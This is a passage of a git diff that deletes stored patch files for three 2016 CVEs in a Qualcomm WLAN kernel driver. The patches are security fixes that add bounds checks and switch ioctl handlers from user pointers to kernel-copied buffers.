*genie; -+ u_int8_t *genie = (u_int8_t *)extra; - v_U16_t remLen; - - ENTER(); -@@ -1400,7 +1400,6 @@ static int iw_set_genie(struct net_device *dev, - return 0; - } - -- genie = wrqu->data.pointer; - remLen = wrqu->data.length; - - hddLog(LOG1,"iw_set_genie ioctl IE[0x%X], LEN[%d]\n", genie[0], genie[1]); -@@ -1528,9 +1527,14 @@ static int iw_get_genie(struct net_device *dev, - pAdapter->sessionId, - &length, - genIeBytes); -- wrqu->data.length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN); -- -- vos_mem_copy( wrqu->data.pointer, (v_VOID_t*)genIeBytes, wrqu->data.length); -+ length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN); -+ if (wrqu->data.length < length) -+ { -+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__); -+ return -EFAULT; -+ } -+ vos_mem_copy( extra, (v_VOID_t*)genIeBytes, wrqu->data.length); -+ wrqu->data.length = length; - - hddLog(LOG1,"%s: RSN IE of %d bytes returned\n", __func__, wrqu->data.length ); - -@@ -2220,7 +2224,7 @@ static int iw_get_rssi(struct net_device *dev, - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = 
WLAN_HDD_GET_PRIV_PTR(dev); -- char *cmd = (char*)wrqu->data.pointer; -+ char *cmd = extra; - int len = wrqu->data.length; - v_S7_t s7Rssi = 0; - hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter); -@@ -2477,7 +2481,7 @@ static int iw_set_priv(struct net_device *dev, - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- char *cmd = (char*)wrqu->data.pointer; -+ char *cmd = extra; - int cmd_len = wrqu->data.length; - int ret = 0; - int status = 0; -@@ -2731,6 +2735,16 @@ done: - /* there was an encoding error or overflow */ - status = -EIO; - } -+ else if (ret > 0) -+ { -+ if (copy_to_user(wrqu->data.pointer, cmd, ret)) -+ { -+ hddLog(VOS_TRACE_LEVEL_ERROR, -+ "%s: failed to copy data to user buffer", __func__); -+ return -EFAULT; -+ } -+ wrqu->data.length = ret; -+ } - - if (ioctl_debug) - { -@@ -2738,7 +2752,6 @@ done: - __func__, cmd, wrqu->data.length, status); - } - return status; -- - } - - static int iw_set_nick(struct net_device *dev, -@@ -3683,7 +3696,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - #endif /* WLAN_FEATURE_VOWIFI */ - - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received length %d", __func__, wrqu->data.length); -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, (char*)wrqu->data.pointer); -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, extra); - - if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) - { -@@ -3696,11 +3709,11 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - { - case WE_WOWL_ADD_PTRN: - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "ADD_PTRN\n"); -- hdd_add_wowl_ptrn(pAdapter, (char*)wrqu->data.pointer); -+ hdd_add_wowl_ptrn(pAdapter, extra); - break; - case WE_WOWL_DEL_PTRN: - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "DEL_PTRN\n"); -- hdd_del_wowl_ptrn(pAdapter, 
(char*)wrqu->data.pointer); -+ hdd_del_wowl_ptrn(pAdapter, extra); - break; - #if defined WLAN_FEATURE_VOWIFI - case WE_NEIGHBOR_REPORT_REQUEST: -@@ -3715,7 +3728,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - if( !neighborReq.no_ssid ) - { - neighborReq.ssid.length = (wrqu->data.length - 1) > 32 ? 32 : (wrqu->data.length - 1) ; -- vos_mem_copy( neighborReq.ssid.ssId, wrqu->data.pointer, neighborReq.ssid.length ); -+ vos_mem_copy( neighborReq.ssid.ssId, extra, neighborReq.ssid.length ); - } - - callbackInfo.neighborRspCallback = NULL; -@@ -3733,10 +3746,10 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - #endif - case WE_SET_AP_WPS_IE: - hddLog( LOGE, "Received WE_SET_AP_WPS_IE" ); -- sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), wrqu->data.pointer, wrqu->data.length ); -+ sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), extra, wrqu->data.length ); - break; - case WE_SET_CONFIG: -- vstatus = hdd_execute_config_command(pHddCtx, wrqu->data.pointer); -+ vstatus = hdd_execute_config_command(pHddCtx, extra); - if (VOS_STATUS_SUCCESS != vstatus) - { - ret = -EINVAL; -@@ -4244,7 +4257,7 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); - tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter); - int sub_cmd = wrqu->data.flags; -- int *value = (int*)wrqu->data.pointer; -+ int *value = (int*)extra; - int apps_args[MAX_VAR_ARGS] = {0}; - int num_args = wrqu->data.length; - hdd_station_ctx_t *pStaCtx = NULL ; -@@ -4595,10 +4608,10 @@ static int iw_qcom_set_wapi_mode(struct net_device *dev, struct iw_request_info - hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter); - tCsrRoamProfile *pRoamProfile = &pWextState->roamProfile; - -- WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)wrqu->data.pointer; -+ WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)extra; - - hddLog(LOG1, "The function 
iw_qcom_set_wapi_mode called"); -- hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer); -+ hddLog(LOG1, "%s: Received data %s", __func__, extra); - hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length); - hddLog(LOG1, "%s: Input Data (wreq) WAPI Mode:%02d", __func__, pWapiMode->wapiMode); - -@@ -4661,7 +4674,6 @@ static int iw_qcom_set_wapi_assoc_info(struct net_device *dev, struct iw_request - int i = 0, j = 0; - hddLog(LOG1, "The function iw_qcom_set_wapi_assoc_info called"); - hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length); -- hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer); - hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra); - - if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) -@@ -4727,7 +4739,6 @@ static int iw_qcom_set_wapi_key(struct net_device *dev, struct iw_request_info * - - hddLog(LOG1, "The function iw_qcom_set_wapi_key called "); - hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length); -- hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer); - hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra); - - hddLog(LOG1,":s: INPUT DATA:\nKey Type:0x%02x Key Direction:0x%02x KEY ID:0x%02x\n", __func__,pWapiKey->keyType,pWapiKey->keyDirection,pWapiKey->keyId); -@@ -4828,12 +4839,11 @@ static int iw_qcom_set_wapi_bkid(struct net_device *dev, struct iw_request_info - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); - #ifdef WLAN_DEBUG - int i = 0; -- WLAN_BKID_LIST *pBkid = ( WLAN_BKID_LIST *) (wrqu->data.pointer); -+ WLAN_BKID_LIST *pBkid = ( WLAN_BKID_LIST *) extra; - #endif - - hddLog(LOG1, "The function iw_qcom_set_wapi_bkid called"); - hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length); -- hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer); - hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra); - - hddLog(LOG1,"%s: INPUT DATA:\n BKID Length:0x%08lx\n", 
__func__,pBkid->length); -@@ -4910,7 +4920,7 @@ static int iw_set_fties(struct net_device *dev, struct iw_request_info *info, - #endif - - // Pass the received FT IEs to SME -- sme_SetFTIEs( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, wrqu->data.pointer, -+ sme_SetFTIEs( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, extra, - wrqu->data.length); - - return 0; -@@ -4922,7 +4932,7 @@ static int iw_set_dynamic_mcbc_filter(struct net_device *dev, - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- tpRcvFltMcAddrList pRequest = (tpRcvFltMcAddrList)wrqu->data.pointer; -+ tpRcvFltMcAddrList pRequest = (tpRcvFltMcAddrList)extra; - hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter); - tpSirWlanSetRxpFilters wlanRxpFilterParam; - tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter); -@@ -5067,7 +5077,7 @@ static int iw_set_host_offload(struct net_device *dev, struct iw_request_info *i - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- tpHostOffloadRequest pRequest = (tpHostOffloadRequest)wrqu->data.pointer; -+ tpHostOffloadRequest pRequest = (tpHostOffloadRequest) extra; - tSirHostOffloadReq offloadRequest; - - if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) -@@ -5076,7 +5086,6 @@ static int iw_set_host_offload(struct net_device *dev, struct iw_request_info *i - "%s:LOGP in Progress. Ignore!!!", __func__); - return -EBUSY; - } -- - /* Debug display of request components. 
*/ - switch (pRequest->offloadType) - { -@@ -5139,7 +5148,7 @@ static int iw_set_keepalive_params(struct net_device *dev, struct iw_request_inf - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- tpKeepAliveRequest pRequest = (tpKeepAliveRequest)wrqu->data.pointer; -+ tpKeepAliveRequest pRequest = (tpKeepAliveRequest) extra; - tSirKeepAliveReq keepaliveRequest; - - if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) -@@ -5340,7 +5349,7 @@ static int iw_set_packet_filter_params(struct net_device *dev, struct iw_request - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- tpPacketFilterCfg pRequest = (tpPacketFilterCfg)wrqu->data.pointer; -+ tpPacketFilterCfg pRequest = (tpPacketFilterCfg) extra; - - return wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId); - } -@@ -5573,7 +5582,7 @@ VOS_STATUS iw_set_pno(struct net_device *dev, struct iw_request_info *info, - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, - "PNO data len %d data %s", - wrqu->data.length, -- wrqu->data.pointer); -+ extra); - - if (wrqu->data.length <= nOffset ) - { -@@ -5611,7 +5620,7 @@ VOS_STATUS iw_set_pno(struct net_device *dev, struct iw_request_info *info, - - scan every 5 seconds 2 times, scan every 300 seconds until stopped - -----------------------------------------------------------------------*/ -- ptr = (char*)(wrqu->data.pointer + nOffset); -+ ptr = extra + nOffset; - - sscanf(ptr,"%hhu%n", &(pnoRequest.enable), &nOffset); - -@@ -5822,7 +5831,7 @@ VOS_STATUS iw_set_rssi_filter(struct net_device *dev, struct iw_request_info *in - v_U8_t rssiThreshold = 0; - v_U8_t nRead; - -- nRead = sscanf(wrqu->data.pointer + nOffset,"%hhu", -+ nRead = sscanf(extra + nOffset,"%hhu", - &rssiThreshold); - - if ( 1 != nRead ) -@@ -5983,7 +5992,7 @@ static int iw_set_band_config(struct net_device *dev, - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = 
WLAN_HDD_GET_PRIV_PTR(dev); -- tANI_U8 *ptr = (tANI_U8*)wrqu->data.pointer; -+ tANI_U8 *ptr = extra; - int ret = 0; - - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,"%s: ", __func__); -@@ -6030,7 +6039,7 @@ VOS_STATUS iw_set_power_params(struct net_device *dev, struct iw_request_info *i - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, - "Power Params data len %d data %s", - wrqu->data.length, -- wrqu->data.pointer); -+ extra); - - if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) - { -@@ -6072,7 +6081,7 @@ VOS_STATUS iw_set_power_params(struct net_device *dev, struct iw_request_info *i - powerRequest.uEnableBET = SIR_NOCHANGE_POWER_VALUE; - powerRequest.uBETInterval = SIR_NOCHANGE_POWER_VALUE; - -- ptr = (char*)(wrqu->data.pointer + nOffset); -+ ptr = extra + nOffset; - - while ( uTotalSize ) - { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2470/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-2470/ANY/0002.patch deleted file mode 100644 index b2007b28..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2470/ANY/0002.patch +++ /dev/null 
@@ -1,88 +0,0 @@ -From 4c9789ba9ed03adaa689d0831524ed6e5ca00fcd Mon Sep 17 00:00:00 2001 -From: Vinay Krishna Eranna -Date: Mon, 21 Apr 2014 20:17:57 +0530 -Subject: wlan: Avoid abort due to access of deinitialised socket - -If driver initialization fails after nl initialization, -driver tries to stop PE by posting the message to MC -thread which in turn tries to send a message to the -ptt App, by this time the socket would have been -de-initialized due to which abort occurs. - -Avoid sending any message during load unload in progress. -Reduce the min number of logging buffers to support low -memory devices and use vmalloc instead for logging buffer -allocation. - -Change-Id: Ifdcd6ef0d92f0a68d03193070057a67818371674 -CRs-Fixed: 652067 ---- - CORE/HDD/inc/wlan_hdd_cfg.h | 2 +- - CORE/SVC/src/logging/wlan_logging_sock_svc.c | 5 +++-- - CORE/VOSS/src/vos_diag.c | 7 +++++++ - 3 files changed, 11 insertions(+), 3 deletions(-) - -diff --git a/CORE/HDD/inc/wlan_hdd_cfg.h b/CORE/HDD/inc/wlan_hdd_cfg.h -index 6451154..ea5e05d 100644 ---- a/CORE/HDD/inc/wlan_hdd_cfg.h -+++ b/CORE/HDD/inc/wlan_hdd_cfg.h -@@ -2067,7 +2067,7 @@ This feature requires the dependent cfg.ini "gRoamPrefer5GHz" set to 1 */ - - //Number of buffers to be used for WLAN logging - #define CFG_WLAN_LOGGING_NUM_BUF_NAME "wlanLoggingNumBuf" --#define CFG_WLAN_LOGGING_NUM_BUF_MIN ( 8 ) -+#define CFG_WLAN_LOGGING_NUM_BUF_MIN ( 4 ) - #define CFG_WLAN_LOGGING_NUM_BUF_MAX ( 64 ) - #define CFG_WLAN_LOGGING_NUM_BUF_DEFAULT ( 32 ) - #endif //WLAN_LOGGING_SOCK_SVC_ENABLE -diff --git a/CORE/SVC/src/logging/wlan_logging_sock_svc.c b/CORE/SVC/src/logging/wlan_logging_sock_svc.c -index 9ac2201..4b78a0d 100644 ---- a/CORE/SVC/src/logging/wlan_logging_sock_svc.c -+++ b/CORE/SVC/src/logging/wlan_logging_sock_svc.c -@@ -30,6 +30,7 @@ - * - ******************************************************************************/ - #ifdef WLAN_LOGGING_SOCK_SVC_ENABLE -+#include - #include - #include - #include -@@ -487,7 +488,7 @@ int 
wlan_logging_sock_activate_svc(int log_fe_to_console, int num_buf) - - gapp_pid = INVALID_PID; - -- gplog_msg = (struct log_msg *) vos_mem_malloc( -+ gplog_msg = (struct log_msg *) vmalloc( - num_buf * sizeof(struct log_msg)); - if (!gplog_msg) { - pr_err("%s: Could not allocate memory\n", __func__); -@@ -545,7 +546,7 @@ int wlan_logging_sock_deactivate_svc(void) - wake_up_interruptible(&gwlan_logging.wait_queue); - wait_for_completion_interruptible(&gwlan_logging.shutdown_comp); - -- vos_mem_free(gplog_msg); -+ vfree(gplog_msg); - - pr_info("%s: Deactivate wlan_logging svc\n", __func__); - -diff --git a/CORE/VOSS/src/vos_diag.c b/CORE/VOSS/src/vos_diag.c -index 5b1dfde..06be463 100644 ---- a/CORE/VOSS/src/vos_diag.c -+++ b/CORE/VOSS/src/vos_diag.c -@@ -131,6 +131,13 @@ void vos_log_submit(v_VOID_t *plog_hdr_ptr) - /*Get the Hdd Context */ - pHddCtx = ((VosContextType*)(pVosContext))->pHDDContext; - -+ if (WLAN_HDD_IS_LOAD_UNLOAD_IN_PROGRESS(pHddCtx)) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, -+ "%s: Unloading/Loading in Progress. Ignore!!!", __func__); -+ return; -+ } -+ - #ifdef WLAN_KD_READY_NOTIFIER - /* NL is not ready yet, WLAN KO started first */ - if ((pHddCtx->kd_nl_init) && (!pHddCtx->ptt_pid)) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2471/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2471/ANY/0001.patch deleted file mode 100644 index 18eed761..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2471/ANY/0001.patch +++ /dev/null 
@@ -1,43 +0,0 @@
-From 2c8961821b7691a95cbf5ecc6996e8229d6d5303 Mon Sep 17 00:00:00 2001
-From: Arun Khandavalli
-Date: Mon, 9 Nov 2015 10:28:18 +0530
-Subject: wlan: validate essid length before processing scan req
-
-Presently we are not validating the length of the essid received
-and directly copying the buffer without size checking.
-Perform bound checking before processing the scan req.
-
-Change-Id: I786e4feb67bf039df3d217138a412da54f51787d
-CRs-fixed: 890228
----
- CORE/HDD/src/wlan_hdd_scan.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_scan.c b/CORE/HDD/src/wlan_hdd_scan.c
-index 8d3fa84..709fdec 100644
---- a/CORE/HDD/src/wlan_hdd_scan.c
-+++ b/CORE/HDD/src/wlan_hdd_scan.c
-@@ -740,7 +740,8 @@ int __iw_set_scan(struct net_device *dev, struct iw_request_info *info,
-
- if (wrqu->data.flags & IW_SCAN_THIS_ESSID) {
-
-- if(scanReq->essid_len) {
-+ if(scanReq->essid_len &&
-+ (scanReq->essid_len <= SIR_MAC_MAX_SSID_LENGTH)) {
- scanRequest.SSIDs.numOfSSIDs = 1;
- scanRequest.SSIDs.SSIDList =( tCsrSSIDInfo *)vos_mem_malloc(sizeof(tCsrSSIDInfo));
- if(scanRequest.SSIDs.SSIDList) {
-@@ -754,6 +755,10 @@ int __iw_set_scan(struct net_device *dev, struct iw_request_info *info,
- VOS_ASSERT(0);
- }
- }
-+ else
-+ {
-+ hddLog(LOGE, FL("Invalid essid length : %d"), scanReq->essid_len);
-+ }
- }
-
- /* set min and max channel time */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2472/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2472/ANY/0001.patch
deleted file mode 100644
index ee065765..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2472/ANY/0001.patch
+++ /dev/null
@@ -1,398 +0,0 @@ -From 464c9c8a984c3a36f63b1625d7ab2a1c9eec9697 Mon Sep 17 00:00:00 2001 -From: Girish Gowli -Date: Mon, 9 Jun 2014 19:47:53 +0530 -Subject: wlan: Deprecate all WAPI ioctls - -ALL WAPI ioctls WLAN_PRIV_SET_WAPI_MODE, WLAN_PRIV_GET_WAPI_MODE -WLAN_PRIV_SET_WAPI_ASSOC_INFO, WLAN_PRIV_SET_WAPI_KEY, -WLAN_PRIV_SET_WAPI_BKID, WLAN_PRIV_GET_WAPI_BKID are not being -used, hence removing the source code related to all these ioctls - -Change-Id: I204cd579b4e29df7e995f30cc0aa8612bc7965ee -CRs-Fixed: 677410 ---- - CORE/HDD/src/wlan_hdd_wext.c | 347 +------------------------------------------ - 1 file changed, 6 insertions(+), 341 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c -index 4af981f..8949474 100644 ---- a/CORE/HDD/src/wlan_hdd_wext.c -+++ b/CORE/HDD/src/wlan_hdd_wext.c -@@ -244,17 +244,12 @@ static const hdd_freq_chan_map_t freq_chan_map[] = { {2412, 1}, {2417, 2}, - #define WLAN_PRIV_DEL_TSPEC (SIOCIWFIRSTPRIV + 11) - #define WLAN_PRIV_GET_TSPEC (SIOCIWFIRSTPRIV + 13) - --#ifdef FEATURE_WLAN_WAPI --/* Private ioctls EVEN NO: SET, ODD NO:GET */ --#define WLAN_PRIV_SET_WAPI_MODE (SIOCIWFIRSTPRIV + 8) --#define WLAN_PRIV_GET_WAPI_MODE (SIOCIWFIRSTPRIV + 16) --#define WLAN_PRIV_SET_WAPI_ASSOC_INFO (SIOCIWFIRSTPRIV + 10) --#define WLAN_PRIV_SET_WAPI_KEY (SIOCIWFIRSTPRIV + 12) --#define WLAN_PRIV_SET_WAPI_BKID (SIOCIWFIRSTPRIV + 14) --#define WLAN_PRIV_GET_WAPI_BKID (SIOCIWFIRSTPRIV + 15) --#define WAPI_PSK_AKM_SUITE 0x02721400 --#define WAPI_CERT_AKM_SUITE 0x01721400 --#endif -+/* (SIOCIWFIRSTPRIV + 8) is currently unused */ -+/* (SIOCIWFIRSTPRIV + 16) is currently unused */ -+/* (SIOCIWFIRSTPRIV + 10) is currently unused */ -+/* (SIOCIWFIRSTPRIV + 12) is currently unused */ -+/* (SIOCIWFIRSTPRIV + 14) is currently unused */ -+/* (SIOCIWFIRSTPRIV + 15) is currently unused */ - - #ifdef FEATURE_OEM_DATA_SUPPORT - /* Private ioctls for setting the measurement configuration */ -@@ -5797,290 +5792,6 @@ static int 
iw_get_tspec(struct net_device *dev, struct iw_request_info *info, - return 0; - } - -- --#ifdef FEATURE_WLAN_WAPI --static int iw_qcom_set_wapi_mode(struct net_device *dev, struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter); -- hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter); -- tCsrRoamProfile *pRoamProfile = &pWextState->roamProfile; -- -- WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)extra; -- -- hddLog(LOG1, "The function iw_qcom_set_wapi_mode called"); -- hddLog(LOG1, "%s: Received data %s", __func__, extra); -- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length); -- hddLog(LOG1, "%s: Input Data (wreq) WAPI Mode:%02d", __func__, pWapiMode->wapiMode); -- -- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL, -- "%s:LOGP in Progress. 
Ignore!!!", __func__); -- return -EBUSY; -- } -- -- if(WZC_ORIGINAL == pWapiMode->wapiMode) { -- hddLog(LOG1, "%s: WAPI Mode Set to OFF", __func__); -- /* Set Encryption mode to defualt , this allows next successfull non-WAPI Association */ -- pRoamProfile->EncryptionType.numEntries = 1; -- pRoamProfile->EncryptionType.encryptionType[0] = eCSR_ENCRYPT_TYPE_NONE; -- pRoamProfile->mcEncryptionType.numEntries = 1; -- pRoamProfile->mcEncryptionType.encryptionType[0] = eCSR_ENCRYPT_TYPE_NONE; -- -- pRoamProfile->AuthType.numEntries = 1; -- pHddStaCtx->conn_info.authType = eCSR_AUTH_TYPE_OPEN_SYSTEM; -- pRoamProfile->AuthType.authType[0] = pHddStaCtx->conn_info.authType; -- } -- else if(WAPI_EXTENTION == pWapiMode->wapiMode) { -- hddLog(LOG1, "%s: WAPI Mode Set to ON", __func__); -- } -- else -- return -EINVAL; -- -- pAdapter->wapi_info.nWapiMode = pWapiMode->wapiMode; -- -- return 0; --} -- --static int iw_qcom_get_wapi_mode(struct net_device *dev, struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)(extra); -- -- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL, -- "%s:LOGP in Progress. 
Ignore!!!", __func__); -- return -EBUSY; -- } -- hddLog(LOG1, "The function iw_qcom_get_wapi_mode called"); -- -- pWapiMode->wapiMode = pAdapter->wapi_info.nWapiMode; -- hddLog(LOG1, "%s: GET WAPI Mode Value:%02d", __func__, pWapiMode->wapiMode); -- return 0; --} -- --static int iw_qcom_set_wapi_assoc_info(struct net_device *dev, struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); --// WAPI_AssocInfo *pWapiAssocInfo = (WAPI_AssocInfo *)(wrqu->data.pointer); -- WAPI_AssocInfo *pWapiAssocInfo = (WAPI_AssocInfo *)(extra); -- int i = 0, j = 0; -- hddLog(LOG1, "The function iw_qcom_set_wapi_assoc_info called"); -- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length); -- hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra); -- -- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL, -- "%s:LOGP in Progress. Ignore!!!", __func__); -- return -EBUSY; -- } -- -- if (NULL == pWapiAssocInfo) -- { -- VOS_TRACE(VOS_MODULE_ID_SYS, VOS_TRACE_LEVEL_ERROR, -- "%s: WDA NULL context", __func__); -- VOS_ASSERT(0); -- return VOS_STATUS_E_FAILURE; -- } -- -- hddLog(LOG1, "%s: INPUT DATA:\nElement ID:0x%02x Length:0x%02x Version:0x%04x",__func__,pWapiAssocInfo->elementID,pWapiAssocInfo->length,pWapiAssocInfo->version); -- hddLog(LOG1,"%s: akm Suite Cnt:0x%04x",__func__,pWapiAssocInfo->akmSuiteCount); -- for(i =0 ; i < 16 ; i++) -- hddLog(LOG1,"akm suite[%02d]:0x%08x",i,pWapiAssocInfo->akmSuite[i]); -- -- hddLog(LOG1,"%s: Unicast Suite Cnt:0x%04x",__func__,pWapiAssocInfo->unicastSuiteCount); -- for(i =0 ; i < 16 ; i++) -- hddLog(LOG1, "Unicast suite[%02d]:0x%08x",i,pWapiAssocInfo->unicastSuite[i]); -- -- hddLog(LOG1,"%s: Multicast suite:0x%08x Wapi capa:0x%04x",__func__,pWapiAssocInfo->multicastSuite,pWapiAssocInfo->wapiCability); -- hddLog(LOG1, "%s: BKID Cnt:0x%04x",__func__,pWapiAssocInfo->bkidCount); -- for(i = 0 ; i < 16 ; i++) 
{ -- hddLog(LOG1, "BKID List[%02d].bkid:0x",i); -- for(j = 0 ; j < 16 ; j++) -- hddLog(LOG1,"%02x",pWapiAssocInfo->bkidList[i].bkid[j]); -- } -- -- /* We are not using the entire IE as provided by the supplicant. -- * This is being calculated by SME. This is the same as in the -- * case of WPA. Only the auth mode information needs to be -- * extracted here*/ -- if ( pWapiAssocInfo->akmSuite[0] == WAPI_PSK_AKM_SUITE ) { -- hddLog(LOG1, "%s: WAPI AUTH MODE SET TO PSK",__func__); -- pAdapter->wapi_info.wapiAuthMode = WAPI_AUTH_MODE_PSK; -- } -- -- if ( pWapiAssocInfo->akmSuite[0] == WAPI_CERT_AKM_SUITE) { -- hddLog(LOG1, "%s: WAPI AUTH MODE SET TO CERTIFICATE",__func__); -- pAdapter->wapi_info.wapiAuthMode = WAPI_AUTH_MODE_CERT; -- } -- return 0; --} -- --static int iw_qcom_set_wapi_key(struct net_device *dev, struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter); -- eHalStatus halStatus = eHAL_STATUS_SUCCESS; -- tANI_U32 roamId = 0xFF; -- tANI_U8 *pKeyPtr = NULL; -- v_BOOL_t isConnected = TRUE; -- tCsrRoamSetKey setKey; -- int i = 0; -- WLAN_WAPI_KEY *pWapiKey = (WLAN_WAPI_KEY *)(extra); -- -- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL, -- "%s:LOGP in Progress. 
